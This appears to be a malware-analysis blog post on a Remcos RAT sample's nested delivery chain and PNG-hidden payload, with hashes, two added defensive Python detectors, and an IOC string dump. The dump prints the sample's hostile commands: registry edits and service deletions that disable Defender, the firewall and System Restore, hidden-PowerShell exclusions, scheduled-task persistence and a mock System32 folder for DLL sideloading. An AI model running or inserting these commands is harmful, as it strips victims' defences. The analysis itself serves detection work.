Friday, January 17, 2020

Remcos RAT Matroska like File execution...

Remcos is one of the more active RAT families in circulation today. In this post I walk through an interesting Remcos sample that uses several techniques to evade detection and sandboxing, with its components nested inside one another like a Matroska doll. The execution flow of this sample is shown in figure 1.

figure 1: remcos execution flow chart

Extraction Stage:

This Remcos variant uses an .ISO file as the container for its malicious files, typically delivered through spam or phishing e-mail. Inside is a self-extracting RAR archive (SFX RAR) holding "Hqspsc.lnk", an "Hqspc" folder that contains "Hqsp" (a .png file), and "Hqspfhf.exe".

The "Hqspsc.lnk" shortcut points to "Hqspfhf.exe", which, once executed, unpacks multiple executables and .dll modules in memory.

figure 2: sfxrar script command

Execution Stage - .PNG Steganography Decryption:

In this stage "Hqspfhf.exe" decrypts in memory a .dll module whose job is to locate the encrypted .dll module embedded in the "Hqspc" image. The decryptor searches the .png file for the marker "911..;", then computes the size of the encrypted data that follows it and decrypts it.

figure 3: decryptor looking for the marker of the encrypted executable in PNG file.
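The marker-after-image layout described above can be checked for defensively: a well-formed PNG ends at its IEND chunk, so any bytes past that point are appended data, and the marker quoted in this write-up can be searched for directly. The following is an added example (not code from the original post or from the sample); the sample PNG it builds is constructed inline, and the payload bytes are a placeholder.

```python
import struct
import zlib

# Marker quoted in the write-up for this sample's decryptor.
MARKER = b"911..;"
PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_iend_offset(data):
    """Walk the PNG chunk list and return the offset just past the IEND chunk,
    or None if the data is not a well-formed PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + chunk data + CRC
        if ctype == b"IEND":
            return pos
    return None


def scan_png(data):
    """Report trailing bytes after IEND and the marker offset (-1 if absent)."""
    end = png_iend_offset(data)
    return {
        "valid_png": end is not None,
        "trailing_bytes": (len(data) - end) if end is not None else 0,
        "marker_offset": data.find(MARKER),
    }


def build_sample(payload, with_marker=True):
    """Constructed test input: a minimal 1x1 PNG, optionally followed by the
    marker and a placeholder payload blob (not real malware data)."""
    def chunk(ctype, body):
        crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
        return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = chunk(b"IDAT", zlib.compress(b"\x00\x00"))
    iend = chunk(b"IEND", b"")
    png = PNG_SIG + ihdr + idat + iend
    return png + MARKER + payload if with_marker else png


if __name__ == "__main__":
    print(scan_png(build_sample(b"PLACEHOLDER-ENCRYPTED-BLOB")))
```

Run it against a real suspect image with `scan_png(open(path, "rb").read())`; a non-zero `trailing_bytes` is worth a closer look even when this specific marker is absent.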

The encrypted file embedded in the .png is an executable container for the Remcos payload. This container also carries functionality to evade Windows Defender Antivirus: it disables the Defender services, tweaks Defender settings in the registry, and more (the full list of commands is in the IOC section below).

figure 4: embedded executable in PNG file "Hqspc"

figure 4.1: the PNG file contains encrypted executable

figure 5: killing Windows Defender Anti-Virus
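The Defender-killing commands in figure 5 (and in the string dump in the IOC section) are plain `reg add`, `sc`, `netsh` and PowerShell one-liners, which makes them easy to flag in command-line or script-block logging. The following is an added example (not from the original post): a small rule set run over a few of the strings quoted in this write-up, constructed here as sample input, that tags each line with the kind of tampering it performs.

```python
import re
from collections import Counter

# Constructed sample input: a handful of the command strings quoted in the IOC section.
SAMPLE_STRINGS = [
    'reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t "REG_DWORD" /d "4" /f',
    'Reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f',
    'reg add "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f',
    'reg add "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f',
    'powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath',
    'sc delete windefend',
    'netsh advfirewall set  currentprofile state off',
    'copy "C:\\Users\\Public\\perfmon.exe" "C:\\Windows \\System32\\"',
    'C:\\Users\\Public\\Clean.bat',
]

# Each rule: (tag, compiled pattern). Tags are names chosen for this example.
RULES = [
    ("defender_service_disabled",
     re.compile(r'Services\\(WinDefend|WdNisSvc|Sense)"\s+/v\s+"?Start"?.*?/d\s+"?4"?', re.I)),
    ("defender_policy_tamper",
     re.compile(r'Windows Defender.*?/v\s+"?Disable\w+"?.*?/d\s+"?1"?', re.I)),
    ("defender_exclusion_added", re.compile(r'Add-MpPreference\s+-ExclusionPath', re.I)),
    ("smartscreen_off", re.compile(r'SmartScreenEnabled.*?/d\s+"?Off"?', re.I)),
    ("system_restore_off", re.compile(r'SystemRestore.*?/v\s+"?Disable(SR|Config)', re.I)),
    ("firewall_off", re.compile(r'netsh\s+(advfirewall|firewall)\s+set\s+.*?(off|disable)', re.I)),
    ("defender_service_removed", re.compile(r'sc\s+(stop|delete)\s+windefend', re.I)),
    # Trailing-space "C:\Windows \" mock directory seen in the sample's copy/mkdir strings.
    ("mock_windows_dir", re.compile(r'C:\\Windows (\\|")', re.I)),
]


def classify(line):
    """Return the list of tags whose pattern matches this command line."""
    return [tag for tag, pat in RULES if pat.search(line)]


def scan(lines):
    """Tag every line and return (per-line tags, tag counts)."""
    tagged = [(line, classify(line)) for line in lines]
    counts = Counter(tag for _, tags in tagged for tag in tags)
    return tagged, counts


if __name__ == "__main__":
    for line, tags in scan(SAMPLE_STRINGS)[0]:
        print(tags or ["-"], line[:70])
```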

Execution Stage - Decrypting and Loading Remcos RAT:

As soon as the embedded file has been decrypted and executed in memory, it decrypts yet another executable, the Remcos RAT itself, which is then executed on the infected machine.

figure 6: Remcos RAT

Conclusion:

In this Remcos variant we saw how the malware authors keep updating their toolset to evade detection: the attack is split into multiple components, and several executables are embedded one inside another within a chosen packer container to hide the actual payload.

IOC:

sfx file:
sha1: 798c17639e6d26a1c343a3ecc956545cf87540e8
md5: ae3063d3ebade140546fd284b2835527
sha256: ba106399e3201a374b6324806ae09f5fa27f86f2c7d85839a4d6146155fc7c73

https://app.any.run/tasks/72547529-e4ec-44d6-9833-081f652dff09

Dll module that contains the encrypted Remcos malware and KILL Windows Defender:
sha1: ea5b33762f86345e7a3659323b439ea562237a70
md5: ff3dc3d04bf3f952d0a47007203216c2
sha256: 45700c3753ee5b185d327dd5c8e2d2a1c0221b0aa86c3ad65a1df151a1dff6d0

https://app.any.run/tasks/13a75725-0420-4252-8ffc-f65e3fe700e8

REMCOS RAT:
sha1: ba9239ee69563d592c30e0e4396f46f705d6e0b4
md5: b9c247a20b84eed9516cef93dfaa3227
sha256: d02d91bf556796803905bf9b4d05d4bdc321c2c3776c8c76c32e879f17b17d9a

https://www.virustotal.com/gui/file-analysis/YjljMjQ3YTIwYjg0ZWVkOTUxNmNlZjkzZGZhYTMyMjc6MTU3OTI1Nzk0NQ==/detection

IOC's Command and String:

92740:DVCLAL
92780:AppData
92796:Local
92812:rwe.exe
92828:oet.vbs
92844:_setko.hta
92864:C:\Users\Public\
92904:path = "
92936:WScript.Sleep
92960:<script>
92980:var shell = new ActiveXObject("Shell.Application");
93040:shell.ShellExecute("
93072:","","","open","0");
93104:window.close();
93128:</script>
93140:C:\Users\Public\Clean.bat
93168:C:\Users\Public\SSPICLI.dll
93196:C:\Users\Public\Runex.bat
93224:C:\Users\Public\perfmon.exe
93260:schtasks /Create /SC ONLOGON /TN
93304: /tr "
93320:" /RL HIGHEST
93344:cmd /c md C:\Windows\
93376:del /q "C:\Windows \System32\*"
93416:rmdir "C:\Windows \System32"
93456:rmdir "C:\Windows \"
93488:powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath
93664:exit
93672:usax
93680:usa
93692:mkdir "\\?\C:\Windows "
93728:mkdir "\\?\C:\Windows \System32"
93772:copy "C:\Users\Public\perfmon.exe" "C:\Windows \System32\"
93840:copy "C:\Users\Public\SSPICLI.dll" "C:\Windows \System32\"
93908:"C:\Windows \System32\perfmon.exe"
93956:C:\Windows\
93976:SOFTWARE\Microsoft\Windows\CurrentVersion\Run
94032:.bat
94040:rasphone.exe
94064:rasphone.exe
94080:runonce.exe
94100:runonce.exe
94112:svchost.exe
94212:TapiUnattend.exe
94308:schtasks.exe
94400:sxstrace.exe
94488:v.exe
94496:Open
96584:l#@
96652:Error
96660:Runtime error     at 00000000
96692:0123456789ABCDEF

98844:reg add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t "REG_DWORD" /d "4" /f
98936:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
99048:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
99157:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
99276:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
99396:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t "REG_DWORD" /d "4" /f
99491:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t "REG_DWORD" /d "1" /f
99602:reg add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t "REG_DWORD" /d "4" /f
99698:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
99811:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
99921:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
100040:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
100156:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
100264:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
100400:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
100536:Reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
100674:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t "REG_DWORD" /d "0" /f
100786:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t "REG_DWORD" /d "2" /f
100895:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallDay" /t "REG_DWORD" /d "0" /f
101014:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "ScheduledInstallTime" /t "REG_DWORD" /d "3" /f
101134:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101249:reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
101363:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101476:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101586:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
101705:reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR " /t "REG_DWORD" /d "1" /f
101821:Reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /f
102002:Reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
102117:sc stop windefend
102136:sc delete windefend
102157:netsh firewall set opmode disable
102192:netsh advfirewall set  currentprofile state off
102241:net stop wuauserv
102260:REG add "HKLM\SYSTEM\CurrentControlSet\services\MpsSvc" /v Start /t REG_DWORD /d 4 /f
102347:REG add "HKLM\SYSTEM\CurrentControlSet\services\wscsvc" /v Start /t REG_DWORD /d 4 /f
102434:REG add "HKLM\SYSTEM\CurrentControlSet\services\SENS" /v Start /t REG_DWORD /d 4 /f
102519:reg delete hkcu\Environment /v windir /f